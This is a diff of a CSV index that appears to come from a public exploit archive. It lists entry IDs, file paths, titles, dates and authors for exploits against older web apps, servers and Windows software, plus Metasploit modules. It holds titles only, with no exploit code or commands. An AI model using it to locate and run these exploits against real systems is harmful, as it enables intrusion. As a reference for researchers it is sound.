PoC",2012-12-20,nitr0us,multiple,dos,0 @@ -20735,7 +20769,7 @@ id,file,description,date,author,platform,type,port 23549,platforms/cgi/webapps/23549.txt,"MetaDot Portal Server 5.6.x index.pl Information Disclosure",2004-01-16,JeiAr,cgi,webapps,0 23550,platforms/cgi/webapps/23550.txt,"MetaDot Portal Server 5.6.x index.pl Multiple Parameter XSS",2004-01-16,JeiAr,cgi,webapps,0 23551,platforms/cgi/webapps/23551.txt,"MetaDot Portal Server 5.6.x userchannel.pl op Parameter XSS",2004-01-16,JeiAr,cgi,webapps,0 -23552,platforms/windows/remote/23552.xml,"Sun J2EE/RI 1.4,Sun JDK 1.4.2 JDBC Database Insecure Default Policy Vulnerabilities",2004-01-19,"Marc Schoenefeld",windows,remote,0 +23552,platforms/windows/remote/23552.xml,"Sun J2EE/RI 1.4_Sun JDK 1.4.2 JDBC Database Insecure Default Policy Vulnerabilities",2004-01-19,"Marc Schoenefeld",windows,remote,0 23553,platforms/php/webapps/23553.php,"Mambo Open Source 4.5/4.6 mod_mainmenu.php Remote File Include Vulnerability",2004-01-19,Yo_Soy,php,webapps,0 23554,platforms/php/webapps/23554.java,"YABB SE 1.x SSI.PHP ID_MEMBER SQL Injection Vulnerability",2004-01-19,BaCkSpAcE,php,webapps,0 23555,platforms/windows/remote/23555.txt,"GoAhead WebServer 2.1.x - Directory Management Policy Bypass Vulnerability",2004-01-19,"Luigi Auriemma",windows,remote,0 @@ -20746,9 +20780,9 @@ id,file,description,date,author,platform,type,port 23560,platforms/windows/remote/23560.txt,"anteco visual technologies ownserver 1.0 - Directory Traversal Vulnerability",2004-01-20,"Rafel Ivgi The-Insider",windows,remote,0 23561,platforms/asp/webapps/23561.txt,"DUware Software Multiple Vulnerabilities",2004-01-20,"Security Corporation",asp,webapps,0 23562,platforms/windows/remote/23562.html,"2Wire HomePortal Series - Directory Traversal Vulnerability",2004-01-20,"Rafel Ivgi The-Insider",windows,remote,0 +23565,platforms/windows/dos/23565.txt,"Sony PC Companion 2.1 (DownloadURLToFile()) Stack-based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0 23563,platforms/multiple/remote/23563.txt,"Darkwet Network WebcamXP 1.6.945 - Cross-Site Scripting Vulnerability",2004-01-21,"Rafel Ivgi The-Insider",multiple,remote,0 23564,platforms/multiple/remote/23564.txt,"Mephistoles HTTPD 0.6 - Cross-Site Scripting Vulnerability",2004-01-21,"Donato Ferrante",multiple,remote,0 -23565,platforms/windows/dos/23565.txt,"Sony PC Companion 2.1 (DownloadURLToFile()) Stack-based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0 23567,platforms/windows/dos/23567.txt,"Sony PC Companion 2.1 (Load()) Stack-based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0 23568,platforms/windows/dos/23568.txt,"Sony PC Companion 2.1 (CheckCompatibility()) Stack-based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0 23569,platforms/windows/dos/23569.txt,"Sony PC Companion 2.1 (Admin_RemoveDirectory()) Stack-based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0 @@ -20757,6 +20791,8 @@ id,file,description,date,author,platform,type,port 23573,platforms/php/webapps/23573.txt,"banana dance b.2.6 - Multiple Vulnerabilities",2012-12-21,"High-Tech Bridge SA",php,webapps,0 23574,platforms/windows/dos/23574.txt,"FireFly Mediaserver 1.0.0.1359 NULL Pointer Dereference",2012-12-21,"High-Tech Bridge SA",windows,dos,0 23575,platforms/php/webapps/23575.txt,"Elite Bulletin Board 2.1.21 - Multiple SQL Injection Vulnerabilities",2012-12-21,"High-Tech Bridge SA",php,webapps,0 +23878,platforms/windows/remote/23878.txt,"HP Web Jetadmin 7.5.2456 Printer Firmware Update Script Arbitrary File Upload Weakness",2004-03-24,wirepair,windows,remote,0 +23877,platforms/windows/remote/23877.txt,"NexGen FTP Server 1.0/2.x - Remote Directory Traversal Vulnerability",2004-03-24,"Ziv Kamir",windows,remote,0 23579,platforms/unix/remote/23579.rb,"TWiki MAKETEXT Remote Command Execution",2012-12-23,metasploit,unix,remote,0 23580,platforms/unix/remote/23580.rb,"Foswiki MAKETEXT Remote Command Execution",2012-12-23,metasploit,unix,remote,0 23581,platforms/linux/local/23581.pl,"Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability",2004-01-21,"Steve Grubb",linux,local,0 @@ -20779,11 +20815,12 @@ id,file,description,date,author,platform,type,port 23598,platforms/multiple/remote/23598.txt,"IBM Net.Data 7.0/7.2 db2www Error Message Cross-Site Scripting Vulnerability",2004-01-26,"Carsten Eiram",multiple,remote,0 23599,platforms/php/webapps/23599.txt,"Gallery 1.3.x/1.4 - Remote Global Variable Injection Vulnerability",2004-01-26,"Bharat Mediratta",php,webapps,0 23600,platforms/multiple/remote/23600.txt,"Herberlin BremsServer 1.2.4 - Cross-Site Scripting Vulnerability",2004-01-26,"Donato Ferrante",multiple,remote,0 +23694,platforms/windows/remote/23694.rb,"RealPlayer RealMedia File Handling Buffer Overflow",2012-12-27,metasploit,windows,remote,0 23601,platforms/multiple/remote/23601.rb,"Netwin SurgeFTP Remote Command Execution",2012-12-23,metasploit,multiple,remote,0 23602,platforms/windows/dos/23602.txt,"mIRC 6.1 DCC Get Dialog Denial of Service Vulnerability",2004-01-26,"MASTER VIPER",windows,dos,0 23603,platforms/windows/remote/23603.py,"herberlin bremsserver 1.2.4/3.0 - Directory Traversal Vulnerability",2004-01-26,"Donato Ferrante",windows,remote,0 23604,platforms/linux/remote/23604.txt,"Antologic Antolinux 1.0 - Administrative Interface NDCR Parameter Remote Command Execution",2004-01-26,"Himeur Nourredine",linux,remote,0 -23605,platforms/solaris/remote/23605.txt,"Cherokee 0.1.x/0.2.x/0.4.x Error Page Cross-Site Scripting Vulnerability",2004-01-26,"César Fernández",solaris,remote,0 +23605,platforms/solaris/remote/23605.txt,"Cherokee 0.1.x/0.2.x/0.4.x Error Page Cross-Site Scripting Vulnerability",2004-01-26,"César Fernández",solaris,remote,0 23606,platforms/php/webapps/23606.txt,"Xoops 2.0.x Viewtopic.php Cross-Site Scripting Vulnerability",2004-01-26,"Ben Drysdale",php,webapps,0 23607,platforms/php/webapps/23607.txt,"Kietu 2/3 Index.PHP Remote File Include Vulnerability",2004-01-26,"Himeur Nourredine",php,webapps,0 23608,platforms/windows/remote/23608.pl,"InternetNow ProxyNow 2.6/2.75 - Multiple Stack and Heap Overflow Vulnerabilities",2004-01-26,"Peter Winter-Smith",windows,remote,0 @@ -20803,14 +20840,15 @@ id,file,description,date,author,platform,type,port 23622,platforms/lin_x86/shellcode/23622.c,"Linux/x86 Remote Port Forwarding Shellcode 87 bytes",2012-12-24,"Hamza Megahed",lin_x86,shellcode,0 23623,platforms/php/webapps/23623.txt,"City Directory Review and Rating Script (search.php) SQL Injection Vulnerability",2012-12-24,3spi0n,php,webapps,0 23624,platforms/php/webapps/23624.txt,"MyBB HM My Country Flags - SQL Injection",2012-12-24,JoinSe7en,php,webapps,0 -23625,platforms/php/webapps/23625.txt,"MyBB AwayList Plugin (index.php, id parameter) - SQL Injection Vulnerability",2012-12-24,Red_Hat,php,webapps,0 -23628,platforms/php/webapps/23628.txt,"JBrowser 1.0/2.x Unauthorized Admin Access Vulnerability",2004-01-30,"Himeur Nourredine",php,webapps,0 -23629,platforms/cgi/webapps/23629.txt,"Leif M. Wright Web Blog 1.1 - Remote Command Execution Vulnerability",2004-01-31,ActualMInd,cgi,webapps,0 -23630,platforms/php/webapps/23630.txt,"Aprox Portal 3.0 File Disclosure Vulnerability",2004-01-31,"Zero X",php,webapps,0 -23631,platforms/php/webapps/23631.txt,"PHP-Nuke 6.x - Multiple Module SQL Injection Vulnerabilities",2004-02-02,"Security Corporation",php,webapps,0 +23625,platforms/php/webapps/23625.txt,"MyBB AwayList Plugin (index.php id parameter) - SQL Injection Vulnerability",2012-12-24,Red_Hat,php,webapps,0 +23686,platforms/windows/dos/23686.txt,"Monkey HTTP Daemon 0.x Missing Host Field Denial of Service Vulnerability",2004-02-11,"Luigi Auriemma",windows,dos,0 +23687,platforms/php/webapps/23687.txt,"Macallan Mail Solution Macallan Mail Solution 2.8.4.6 (Build 260) - Web Interface Authentication Bypass Vulnerability",2004-02-12,"Ziv Kamir",php,webapps,0 +23688,platforms/php/webapps/23688.txt,"VBulletin 1.0/1.1/2.0.x/2.2.x - Cross-Site Scripting Vulnerability",2004-02-12,"Jamie Fisher",php,webapps,0 +23689,platforms/windows/dos/23689.c,"Crob FTP Server 3.5.2 - Remote Denial of Service Vulnerability",2004-02-12,gsicht,windows,dos,0 +23690,platforms/linux/dos/23690.txt,"XFree86 4.x CopyISOLatin1Lowered Font_Name Buffer Overflow Vulnerability",2004-02-12,"Greg MacManus",linux,dos,0 23632,platforms/windows/remote/23632.txt,"Crob FTP Server 3.5.1 - Remote Information Disclosure Vulnerability",2004-02-02,"Zero X",windows,remote,0 23633,platforms/windows/dos/23633.txt,"Crob FTP Server 3.5.1 - Denial of Service Vulnerability",2004-02-02,"Zero X",windows,dos,0 -23634,platforms/linux/local/23634.c,"0verkill 0.16 Game Client Multiple Local Buffer Overflow Vulnerabilities",2004-02-02,pi3ki31ny,linux,local,0 +23634,platforms/linux/local/23634.c,"0verkill 0.16 - Game Client Multiple Local Buffer Overflow Vulnerabilities",2004-02-02,pi3ki31ny,linux,local,0 23635,platforms/asp/webapps/23635.txt,"Niti Telecom Caravan Business Server 2.00-03D Remote Directory Traversal Vulnerability",2004-02-02,dr_insane,asp,webapps,0 23636,platforms/php/webapps/23636.txt,"Qualiteam X-Cart 3.x general.php perl_binary Parameter Arbitrary Command Execution",2004-02-03,Philip,php,webapps,0 23637,platforms/php/webapps/23637.txt,"Qualiteam X-Cart 3.x upgrade.php perl_binary Parameter Arbitrary Command Execution",2004-02-03,Philip,php,webapps,0 @@ -20862,16 +20900,6 @@ id,file,description,date,author,platform,type,port 23683,platforms/php/webapps/23683.txt,"VisualShapers ezContents 1.x/2.0 db.php Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0 23684,platforms/php/webapps/23684.txt,"VisualShapers ezContents 1.x/2.0 archivednews.php Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0 23685,platforms/php/webapps/23685.txt,"BosDev BosDates 3.x SQL Injection Vulnerability",2004-02-11,G00db0y,php,webapps,0 -23686,platforms/windows/dos/23686.txt,"Monkey HTTP Daemon 0.x Missing Host Field Denial of Service Vulnerability",2004-02-11,"Luigi Auriemma",windows,dos,0 -23687,platforms/php/webapps/23687.txt,"Macallan Mail Solution Macallan Mail Solution 2.8.4.6 (Build 260) - Web Interface Authentication Bypass Vulnerability",2004-02-12,"Ziv Kamir",php,webapps,0 -23688,platforms/php/webapps/23688.txt,"VBulletin 1.0/1.1/2.0.x/2.2.x - Cross-Site Scripting Vulnerability",2004-02-12,"Jamie Fisher",php,webapps,0 -23689,platforms/windows/dos/23689.c,"Crob FTP Server 3.5.2 - Remote Denial of Service Vulnerability",2004-02-12,gsicht,windows,dos,0 -23690,platforms/linux/dos/23690.txt,"XFree86 4.x CopyISOLatin1Lowered Font_Name Buffer Overflow Vulnerability",2004-02-12,"Greg MacManus",linux,dos,0 -23691,platforms/php/webapps/23691.txt,"VBulletin 3.0 - Search.PHP Cross-Site Scripting Vulnerability",2004-02-13,"Rafel Ivgi The-Insider",php,webapps,0 -23692,platforms/windows/dos/23692.txt,"Sami FTP Server 1.1.3 Invalid Command Argument Local DoS",2004-02-13,"intuit e.b.",windows,dos,0 -23693,platforms/windows/dos/23693.txt,"Sami FTP Server 1.1.3 - Library Crafted GET Request Remote DoS",2004-02-13,"intuit e.b.",windows,dos,0 -23694,platforms/windows/remote/23694.rb,"RealPlayer RealMedia File Handling Buffer Overflow",2012-12-27,metasploit,windows,remote,0 -23695,platforms/windows/remote/23695.txt,"Microsoft Internet Explorer 5.0.1 ITS Protocol Zone Bypass Vulnerability",2004-02-13,anonymous,windows,remote,0 23696,platforms/asp/webapps/23696.pl,"ASP Portal Multiple Vulnerabilities",2004-02-01,"Manuel Lopez",asp,webapps,0 23697,platforms/php/webapps/23697.txt,"AllMyGuests 0.x - info.inc.php Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0 23698,platforms/php/webapps/23698.txt,"AllMyVisitors 0.x info.inc.php Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0 @@ -20957,9 +20985,12 @@ id,file,description,date,author,platform,type,port 23778,platforms/hardware/dos/23778.c,"Motorola T720 Phone Denial of Service Vulnerability",2004-03-01,"Shaun Colley",hardware,dos,0 23779,platforms/linux/dos/23779.txt,"Grep < 2.11 Integer Overflow Crash PoC",2012-12-31,"Joshua Rogers",linux,dos,0 23780,platforms/windows/dos/23780.py,"Aktiv Player 2.80 Crash PoC",2012-12-31,IndonesiaGokilTeam,windows,dos,0 -23781,platforms/php/webapps/23781.txt,"MyBB (editpost.php, posthash) - SQL Injection Vulnerability",2012-12-31,"Joshua Rogers",php,webapps,0 -23782,platforms/php/webapps/23782.txt,"Joomla Spider Calendar (index.php, date param) Blind SQL Injection Vulnerability",2012-12-31,Red-D3v1L,php,webapps,0 +23781,platforms/php/webapps/23781.txt,"MyBB (editpost.php posthash) - SQL Injection Vulnerability",2012-12-31,"Joshua Rogers",php,webapps,0 +23782,platforms/php/webapps/23782.txt,"Joomla Spider Calendar (index.php date param) Blind SQL Injection Vulnerability",2012-12-31,Red-D3v1L,php,webapps,0 23783,platforms/windows/local/23783.rb,"BlazeDVD 6.1 PLF Exploit DEP/ASLR Bypass (MSF)",2012-12-31,"Craig Freyman",windows,local,0 +24047,platforms/php/webapps/24047.txt,"Protector System 1.15 b1 index.php SQL Injection",2004-04-23,waraxe,php,webapps,0 +24048,platforms/php/webapps/24048.txt,"Protector System 1.15 blocker_query.php Multiple Parameter XSS",2004-04-23,waraxe,php,webapps,0 +24046,platforms/php/webapps/24046.txt,"Fusionphp Fusion News 3.6.1 - Cross-Site Scripting Vulnerability",2004-04-23,DarkBicho,php,webapps,0 23785,platforms/windows/remote/23785.rb,"Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability",2013-01-02,metasploit,windows,remote,0 23786,platforms/hardware/dos/23786.c,"Nortel Wireless LAN Access Point 2200 Series Denial of Service Vulnerability",2004-03-02,"Alex Hernandez",hardware,dos,0 23787,platforms/multiple/dos/23787.txt,"1st Class Internet Solutions 1st Class Mail Server 4.0 - Remote Buffer Overflow Vulnerability",2004-03-02,JeFFOsZ,multiple,dos,0 @@ -21005,6 +21036,7 @@ id,file,description,date,author,platform,type,port 23829,platforms/php/webapps/23829.txt,"e107 1.0.2 - CSRF Resulting in SQL Injection",2013-01-02,"Joshua Reynolds",php,webapps,0 23830,platforms/linux/dos/23830.py,"Astium VoIP PBX <= 2.1 build 25399 - Remote Crash PoC",2013-01-02,xistence,linux,dos,5655 23831,platforms/php/webapps/23831.py,"Astium VoIP PBX <= 2.1 build 25399 - Multiple Vulns Remote Root Exploit",2013-01-02,xistence,php,webapps,0 +23902,platforms/multiple/dos/23902.txt,"Roger Wilco Server 1.4.1 UDP Datagram Handling Denial of Service Vulnerability",2004-03-31,"Luigi Auriemma",multiple,dos,0 23834,platforms/php/webapps/23834.txt,"Mambo Open Source 4.5 Index.PHP SQL Injection Vulnerability",2004-03-16,JeiAr,php,webapps,0 23835,platforms/php/webapps/23835.txt,"PHP-Nuke 6.x/7.0/7.1 Image Tag Admin Command Execution Vulnerability",2004-03-16,"Janek Vind",php,webapps,0 23836,platforms/windows/remote/23836.txt,"IBM Lotus Domino 6/7 HTTP webadmin.nsf Directory Traversal Vulnerability",2004-03-17,dr_insane,windows,remote,0 @@ -21036,7 +21068,7 @@ id,file,description,date,author,platform,type,port 23862,platforms/asp/webapps/23862.txt,"Expinion.net News Manager Lite 2.5 news_sort.asp filter Parameter SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps,0 23863,platforms/asp/webapps/23863.txt,"Expinion.net News Manager Lite 2.5 NEWS_LOGIN Cookie ADMIN Parameter Manipulation Admin Authentication Bypass",2004-03-20,"Manuel Lopez",asp,webapps,0 23864,platforms/linux/remote/23864.txt,"xweb 1.0 - Directory Traversal Vulnerability",2004-03-22,"Donato Ferrante",linux,remote,0 -23865,platforms/php/webapps/23865.txt,"VBulletin 2.x Private.PHP Cross-Site Scripting Vulnerability",2004-03-22,JeiAr,php,webapps,0 +23865,platforms/php/webapps/23865.txt,"VBulletin 2.x - Private.PHP Cross-Site Scripting Vulnerability",2004-03-22,JeiAr,php,webapps,0 23866,platforms/php/webapps/23866.txt,"phpBB 1.x/2.0.x - Multiple Input Validation Vulnerabilities",2004-03-22,JeiAr,php,webapps,0 23867,platforms/php/webapps/23867.txt,"Invision Power Services Invision Gallery 1.0.1 - Multiple SQL Injection Vulnerabilities",2004-03-23,JeiAr,php,webapps,0 23868,platforms/php/webapps/23868.txt,"Invision Power Top Site List 1.0/1.1 Comments function id Parameter SQL Injection Vulnerability",2004-03-22,JeiAr,php,webapps,0 @@ -21048,8 +21080,6 @@ id,file,description,date,author,platform,type,port 23874,platforms/solaris/local/23874.txt,"Sun Solaris 2.6/7.0/8/9 vfs_getvfssw function Local Privilege Escalation Vulnerability",2004-03-23,"Sinan Eren",solaris,local,0 23875,platforms/windows/remote/23875.txt,"Trend Micro Interscan Viruswall localweb - Directory Traversal Vulnerability",2004-03-24,"Tri Huynh",windows,remote,0 23876,platforms/hardware/dos/23876.txt,"PicoPhone Internet Phone 1.63 - Remote Buffer Overflow Vulnerability",2004-03-24,"Luigi Auriemma",hardware,dos,0 -23877,platforms/windows/remote/23877.txt,"NexGen FTP Server 1.0/2.x - Remote Directory Traversal Vulnerability",2004-03-24,"Ziv Kamir",windows,remote,0 -23878,platforms/windows/remote/23878.txt,"HP Web Jetadmin 7.5.2456 Printer Firmware Update Script Arbitrary File Upload Weakness",2004-03-24,wirepair,windows,remote,0 23879,platforms/windows/remote/23879.txt,"HP Web Jetadmin 7.5.2456 setinfo.hts Script Directory Traversal Vulnerability",2004-03-24,wirepair,windows,remote,0 23880,platforms/windows/remote/23880.txt,"HP Web Jetadmin 7.5.2456 - Remote Arbitrary Command Execution Vulnerability",2004-03-24,wirepair,windows,remote,0 23881,platforms/linux/remote/23881.txt,"Emil 2.x - Multiple Buffer Overrun and Format String Vulnerabilities",2004-03-25,"Ulf Harnhammar",linux,remote,0 @@ -21060,6 +21090,7 @@ id,file,description,date,author,platform,type,port 23886,platforms/windows/webapps/23886.txt,"simple webserver 2.3-rc1 - Directory Traversal",2013-01-04,"CwG GeNiuS",windows,webapps,0 23887,platforms/windows/remote/23887.rb,"Enterasys NetSight nssyslogd.exe Buffer Overflow",2013-01-04,metasploit,windows,remote,0 23888,platforms/php/webapps/23888.txt,"MyBB Profile Wii Friend Code - Multiple Vulnerabilities",2013-01-04,Ichi,php,webapps,0 +23969,platforms/windows/remote/23969.rb,"IBM Cognos tm1admsd.exe Overflow Vulnerability",2013-01-08,metasploit,windows,remote,0 23890,platforms/cgi/webapps/23890.txt,"Fresh Guest Book 1.0/2.x HTML Injection Vulnerability",2004-03-29,"koi8-r Shelz",cgi,webapps,0 23891,platforms/asp/webapps/23891.txt,"Alan Ward A-Cart 2.0 category.asp catcode Parameter SQL Injection",2004-03-29,"Manuel Lopez",asp,webapps,0 23892,platforms/linux/local/23892.c,"Systrace 1.x - Local Policy Bypass Vulnerability",2004-03-29,Brad,linux,local,0 @@ -21072,7 +21103,6 @@ id,file,description,date,author,platform,type,port 23899,platforms/asp/webapps/23899.txt,"CactuSoft CactuShop 5.0/5.1 - Cross-Site Scripting Vulnerability",2004-03-31,"Nick Gudov",asp,webapps,0 23900,platforms/hardware/dos/23900.txt,"CDP 0.33/0.4 Console CD Player PrintTOC Function Buffer Overflow Vulnerability",2004-03-31,"Shaun Colley",hardware,dos,0 23901,platforms/php/webapps/23901.txt,"pfSense 2.0.1 - XSS / CSRF / Remote Command Execution",2013-01-05,"Yann CAM",php,webapps,0 -23902,platforms/multiple/dos/23902.txt,"Roger Wilco Server 1.4.1 UDP Datagram Handling Denial of Service Vulnerability",2004-03-31,"Luigi Auriemma",multiple,dos,0 23903,platforms/windows/remote/23903.html,"Microsoft Internet Explorer 6.0 HTML Form Status Bar Misrepresentation Vulnerability",2004-03-31,http-equiv,windows,remote,0 23904,platforms/multiple/dos/23904.txt,"Roger Wilco Server 1.4.1 Unauthorized Audio Stream Denial of Service Vulnerability",2004-03-31,"Luigi Auriemma",multiple,dos,0 23905,platforms/windows/remote/23905.txt,"ADA IMGSVR 0.4 - Remote Directory Listing Vulnerability",2004-04-01,"Donato Ferrante & Dr_insane",windows,remote,0 @@ -21138,7 +21168,6 @@ id,file,description,date,author,platform,type,port 23966,platforms/php/webapps/23966.txt,"TikiWiki Project 1.8 - tiki-browse_categories.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 23967,platforms/php/webapps/23967.txt,"E Sms Script Multiple SQL Injection Vulnerabilities",2013-01-08,"cr4wl3r ",php,webapps,0 23968,platforms/asp/webapps/23968.txt,"Advantech WebAccess HMI/SCADA Software Persistence XSS Vulnerability",2013-01-08,"SecPod Research",asp,webapps,0 -23969,platforms/windows/remote/23969.rb,"IBM Cognos tm1admsd.exe Overflow Vulnerability",2013-01-08,metasploit,windows,remote,0 23970,platforms/php/webapps/23970.rb,"WordPress Plugin Google Document Embedder Arbitrary File Disclosure",2013-01-08,metasploit,php,webapps,0 23971,platforms/php/webapps/23971.txt,"TikiWiki Project 1.8 - tiki-index.php comments_offset & offset Parameter SQL Injections",2004-04-12,JeiAr,php,webapps,0 23972,platforms/php/webapps/23972.txt,"TikiWiki Project 1.8 - tiki-user_tasks.php offset & sort_mode Parameter SQL Injections",2004-04-12,JeiAr,php,webapps,0 @@ -21148,6 +21177,8 @@ id,file,description,date,author,platform,type,port 23976,platforms/php/webapps/23976.txt,"TikiWiki Project 1.8 tiki-list_trackers.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 23977,platforms/php/webapps/23977.txt,"TikiWiki Project 1.8 tiki-list_blogs.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 23978,platforms/php/webapps/23978.txt,"TikiWiki Project 1.8 tiki-usermenu.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 +33401,platforms/php/webapps/33401.txt,"Million Pixel Script 3 - 'pa' Parameter Cross-Site Scripting Vulnerability",2009-12-14,bi0,php,webapps,0 +33402,platforms/linux/remote/33402.txt,"Ruby on Rails <= 2.3.5 - 'protect_from_forgery' Cross-Site Request Forgery Vulnerability",2009-12-14,p0deje,linux,remote,0 23982,platforms/php/webapps/23982.txt,"TikiWiki Project 1.8 tiki-list_faqs.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 23983,platforms/php/webapps/23983.txt,"TikiWiki Project 1.8 tiki-list_trackers.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 23984,platforms/php/webapps/23984.txt,"TikiWiki Project 1.8 tiki-list_blogs.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 @@ -21156,15 +21187,15 @@ id,file,description,date,author,platform,type,port 23988,platforms/php/webapps/23988.txt,"Nuked-Klan 1.x - Multiple Vulnerabilities",2004-04-12,frog,php,webapps,0 23989,platforms/windows/local/23989.c,"Microsoft Windows 2000/NT 4 - Local Descriptor Table Local Privilege Escalation Vulnerability",2004-04-18,mslug@safechina.net,windows,local,0 23990,platforms/php/webapps/23990.txt,"PHP-Nuke 6.x/7.x CookieDecode Cross-Site Scripting Vulnerability",2004-04-13,waraxe,php,webapps,0 -23991,platforms/php/webapps/23991.txt,"Tutos 1.1.20031017 - note_overview.php id Parameter SQL Injection",2004-04-13,"Franois SORIN",php,webapps,0 +23991,platforms/php/webapps/23991.txt,"Tutos 1.1.20031017 - note_overview.php id Parameter SQL Injection",2004-04-13,"François SORIN",php,webapps,0 +23998,platforms/php/webapps/23998.txt,"PHP-Nuke 6.x/7.x - Multiple SQL Injection Vulnerabilities",2004-04-13,waraxe,php,webapps,0 +23999,platforms/linux/dos/23999.txt,"Neon WebDAV Client Library 0.2x Format String Vulnerabilities",2004-04-14,"Thomas Wana",linux,dos,0 +24000,platforms/windows/dos/24000.pl,"Qualcomm Eudora 6.0.3 MIME Message Nesting Denial of Service Vulnerability",2004-04-14,"Paul Szabo",windows,dos,0 23993,platforms/php/webapps/23993.txt,"websitebaker add-on concert calendar 2.1.4 - Multiple Vulnerabilities",2013-01-09,"Stefan Schurtz",php,webapps,0 23994,platforms/php/webapps/23994.txt,"Free Blog 1.0 - Multiple Vulnerabilities",2013-01-09,"cr4wl3r ",php,webapps,0 23995,platforms/hardware/webapps/23995.txt,"Watson Management Console 4.11.2.G Directory Traversal Vulnerability",2013-01-09,"Dhruv Shah",hardware,webapps,0 23996,platforms/windows/local/23996.py,"Inmatrix Ltd. Zoom Player 8.5 - (.jpeg) Exploit",2013-01-09,"Debasish Mandal",windows,local,0 23997,platforms/php/webapps/23997.txt,"WeBid 1.0.6 - SQL Injection Vulnerability",2013-01-09,"Life Wasted",php,webapps,0 -23998,platforms/php/webapps/23998.txt,"PHP-Nuke 6.x/7.x - Multiple SQL Injection Vulnerabilities",2004-04-13,waraxe,php,webapps,0 -23999,platforms/linux/dos/23999.txt,"Neon WebDAV Client Library 0.2x Format String Vulnerabilities",2004-04-14,"Thomas Wana",linux,dos,0 -24000,platforms/windows/dos/24000.pl,"Qualcomm Eudora 6.0.3 MIME Message Nesting Denial of Service Vulnerability",2004-04-14,"Paul Szabo",windows,dos,0 24001,platforms/cgi/webapps/24001.txt,"Rhino Software Zaep AntiSpam 2.0 - Cross-Site Scripting Vulnerability",2004-04-14,"Noam Rathaus",cgi,webapps,0 24002,platforms/windows/dos/24002.py,"Microsoft Outlook Express 6.0 - Remote Denial of Service Vulnerability",2004-04-14,"Ben Rampling",windows,dos,0 24003,platforms/php/webapps/24003.txt,"phpBugTracker 0.9 query.php Multiple Parameter SQL Injection",2004-04-15,JeiAr,php,webapps,0 @@ -21210,9 +21241,6 @@ id,file,description,date,author,platform,type,port 24043,platforms/linux/local/24043.c,"Linux Kernel 2.5.x/2.6.x CPUFreq Proc Handler Integer Handling Vulnerability",2004-04-23,"Brad Spengler",linux,local,0 24044,platforms/php/webapps/24044.txt,"phpliteadmin <= 1.9.3 - Remote PHP Code Injection Vulnerability",2013-01-11,L@usch,php,webapps,0 24045,platforms/java/remote/24045.rb,"Java Applet JMX Remote Code Execution",2013-01-11,metasploit,java,remote,0 -24046,platforms/php/webapps/24046.txt,"Fusionphp Fusion News 3.6.1 - Cross-Site Scripting Vulnerability",2004-04-23,DarkBicho,php,webapps,0 -24047,platforms/php/webapps/24047.txt,"Protector System 1.15 b1 index.php SQL Injection",2004-04-23,waraxe,php,webapps,0 -24048,platforms/php/webapps/24048.txt,"Protector System 1.15 blocker_query.php Multiple Parameter XSS",2004-04-23,waraxe,php,webapps,0 24049,platforms/asp/webapps/24049.txt,"PW New Media Network Modular Site Management System 0.2.1 Ver.asp Information Disclosure Vulnerability",2004-04-23,CyberTalon,asp,webapps,0 24050,platforms/php/webapps/24050.txt,"Advanced Guestbook 2.2 Password Parameter SQL Injection Vulnerability",2004-04-23,JQ,php,webapps,0 24051,platforms/windows/dos/24051.txt,"Microsoft Windows XP/2000/NT 4 Shell Long Share Name Buffer Overrun Vulnerability",2004-04-25,"Rodrigo Gutierrez",windows,dos,0 @@ -21225,7 +21253,7 @@ id,file,description,date,author,platform,type,port 24058,platforms/php/webapps/24058.txt,"OpenBB 1.0.x search.php q Parameter SQL Injection",2004-04-26,JeiAr,php,webapps,0 24059,platforms/php/webapps/24059.txt,"OpenBB 1.0.x post.php Multiple Parameter SQL Injection",2004-04-26,JeiAr,php,webapps,0 24060,platforms/php/webapps/24060.txt,"PHP-Nuke 7.2 - Multiple Video Gallery Module SQL Injection Vulnerabilities",2004-04-26,"k1LL3r B0y",php,webapps,0 -24061,platforms/php/webapps/24061.txt,"OpenBB 1.0.x Private Message Disclosure Vulnerability",2004-04-26,"Manuel Lopez",php,webapps,0 +24061,platforms/php/webapps/24061.txt,"OpenBB 1.0.x - Private Message Disclosure Vulnerability",2004-04-26,"Manuel Lopez",php,webapps,0 24062,platforms/unix/local/24062.pl,"Veritas NetBackup 3.5/4.5/5.0 - Multiple Unspecified Local Memory Corruption Vulnerabilities (1)",2004-04-25,"Secure Network Operations",unix,local,0 24063,platforms/unix/local/24063.pl,"Veritas NetBackup 3.5/4.5/5.0 - Multiple Unspecified Local Memory Corruption Vulnerabilities (2)",2004-04-25,"Secure Network Operations",unix,local,0 24064,platforms/unix/local/24064.pl,"Veritas NetBackup 3.5/4.5/5.0 - Multiple Unspecified Local Memory Corruption Vulnerabilities (3)",2004-04-25,"Secure Network Operations",unix,local,0 @@ -21278,7 +21306,7 @@ id,file,description,date,author,platform,type,port 24113,platforms/bsd/local/24113.c,"NetBSD/FreeBSD Port Systrace 1.x Exit Routine Access Validation Privilege Escalation Vulnerability",2004-05-11,"Stefan Esser",bsd,local,0 24114,platforms/windows/remote/24114.html,"Microsoft Outlook 2003Mail Client E-mail Address Verification Weakness",2004-05-11,http-equiv,windows,remote,0 24115,platforms/hardware/remote/24115.c,"Multiple Linksys Devices DHCP Information Disclosure",2004-05-31,"Jon Hart",hardware,remote,0 -24116,platforms/windows/remote/24116.txt,"Internet Explorer 5,Firefox 0.8,OmniWeb 4.x URI Protocol Handler Arbitrary File Creation/Modification Vulnerability",2004-05-13,"Karol Wiesek",windows,remote,0 